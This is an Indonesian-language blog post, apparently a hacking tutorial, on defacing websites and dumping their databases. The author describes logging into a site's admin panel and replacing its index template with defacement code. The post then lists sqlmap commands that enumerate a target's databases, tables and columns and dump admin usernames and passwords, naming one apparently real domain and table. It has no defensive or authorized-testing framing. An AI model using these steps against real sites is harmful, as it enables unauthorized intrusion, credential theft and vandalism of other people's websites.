-->

Cara Deface Website, Melihat Isi Database Menggunakan Tools Sql Maps

By 10:51 AM Add Comment Edit

saat saya sedang mencari-cari target web untuk di deface ga sengaja saya menemukan sebuah web yang pada halaman admin user dan pass nya sudah ada dari sananya dan lalu saya tinggal masuk aja ke halaman admin sesudah masuk ke halaman admin saya langsung masuk ke menu template lalu cari index dan lalu saya ganti codingannya dengan codingan deface saya yang sederhana sesudah itu save dan lihat hasilnya


Pertama Kita cari target web yang ingin di ambil databasenya, Contoh target web saya: http://xxx.xxx/product.php?id=2 . Setelah itu buka terminal lalu ketikan


    sqlmap -u target kalian –dbs


    contoh: sqlmap -u http://xxx.xxx/product.php?id=2 –dbs


lalu tunggu sampai keluar database, setelah itu pilih database selain information_schema, lalu ketikan :


    sqlmap -u target kalian -D database yang dipilih –tables


    contoh: sqlmap -u http://mascar.it/product.php?id=2 -D mascar –tables


hasilnnya seperti dibawah

setelah keluar table kalian tinggal cari user untuk bisa masuk ke halaman admin dengan cara


    sqlmap -u target kalian -D database yang di pilih -T table yang kalian pilh — columns


atau bisa langsung kalian dump dengan


    sqlmap -u target kalian -D database yang di pilih -T table yang kalian pilh –dump


contoh: sqlmap -u http://xxx.xxx/product.php?id=2 -D mascar -T ac_utenti –dump


hasilnya seperti dibawah

dan nanti akan keluar user dan passnya lalu tinggal login

Berlangganan update artikel terbaru via email:

0 Response to "Cara Deface Website, Melihat Isi Database Menggunakan Tools Sql Maps"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel